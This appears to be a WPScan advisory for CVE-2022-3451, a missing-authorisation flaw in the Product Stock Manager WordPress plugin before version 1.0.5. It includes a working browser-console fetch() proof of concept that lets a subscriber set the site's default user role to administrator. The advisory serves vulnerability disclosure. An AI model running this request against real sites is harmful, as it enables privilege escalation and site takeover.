Product Stock Manager < 1.0.5 – Subscriber+ Unauthorised AJAX Calls | CVE 2022-3451 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and proper CSRF checks in multiple AJAX actions, allowing users with a role as low as subscriber to call them. One action in particular could allow to update arbitrary options

Proof of Concept

To set the default role for new users to administrator, run the below command in the developer console of the web browser while being logged on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=af_sm_set_checkbox_status&name=default_role&checkbox_status=administrator',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

addify-product-stock-manager

Fixed in 1.0.5

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

d8005cd0-8232-4d43-a4e4-14728eaf1300

Timeline

Publicly Published

2022-10-17 (about 1 years ago)

Added

2022-10-17 (about 1 years ago)

Last Updated

2022-10-17 (about 1 years ago)

Other

Published

Title

Published

2024-04-26

Title

Save as PDF plugin by Pdfcrowd < 3.2.1 - Missing Authorization

Published

2023-09-04

Title

WRC Pricing Tables < 2.3.8 - Missing Authorization

Published

2024-04-18

Title

Poll Maker – Best WordPress Poll Plugin < 5.1.9 - Missing Authorization to Unauthenticated Stored Cross-Site Scripting

Published

2024-04-15

Title

Mega Addons For Elementor <= 1.8 - Missing Authorization

Published

2024-01-05

Title

Booster Plus for WooCommerce < 7.1.2 - Missing Authorization to Arbitrary Page/Post Deletion